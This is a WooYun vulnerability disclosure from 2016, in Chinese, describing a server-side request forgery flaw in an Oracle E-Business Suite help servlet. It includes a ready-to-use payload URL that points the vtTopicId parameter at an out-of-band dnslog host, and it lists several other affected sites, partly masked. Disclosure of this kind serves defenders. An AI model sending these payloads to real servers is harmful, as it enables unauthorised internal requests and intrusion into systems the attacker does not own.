Oracle EBusiness某版本一处SSRF漏洞/影响网站包括stanford.edu域名 | wooyun-2016-0194237

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2016-0194237

漏洞标题：

Oracle EBusiness某版本一处SSRF漏洞/影响网站包括stanford.edu域名

漏洞详情

披露状态：

2016-04-10：细节已通知厂商并且等待厂商处理中
2016-04-14：厂商已经确认，细节仅向厂商公开
2016-04-17：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2016-06-08：细节向核心白帽子及相关领域专家公开
2016-06-18：细节向普通白帽子公开
2016-06-28：细节向实习白帽子公开
2016-07-13：细节向公众公开

简要描述：

Oracle EBusiness一处SSRF

详细说明：

某次扫描中发现一处Oracle EBusiness的SSRF漏洞，详情如下：

http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId={TARGET}

利用神器cloudeye配合进行验证：
访问构造的地址

http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

cloudeye中DNS日志、apache access日志：

证明服务端确实访问了构造的地址：http://66ae2b.dnslog.info/aabb
利用google hacking找了一些其他受影响的网站，惊现**.**.**.**某站点，具体列表如下：

http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://**.**.**.**.au/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://ofweb.**.**.**.**:8051/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://**.**.**.**:4453/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

漏洞证明：

某次扫描中发现一处Oracle EBusiness的SSRF漏洞，详情如下：

http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId={TARGET}

利用神器cloudeye配合进行验证：
访问构造的地址

http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

cloudeye中DNS日志、apache access日志：

证明服务端确实访问了构造的地址：http://66ae2b.dnslog.info/aabb
利用google hacking找了一些其他受影响的网站，惊现**.**.**.**某站点，具体列表如下：

http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://**.**.**.**.au/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://ofweb.**.**.**.**:8051/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb
https://**.**.**.**:4453/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb

修复方案：

过滤+删除帮助文档

版权声明：转载请注明来源 sanwenkit@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2016-04-14 15:18

厂商回复：

CNVD未直接复现所述情况，已由CNVD通过软件生产厂商公开联系渠道向其邮件通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 sanwenkit@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 sanwenkit@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞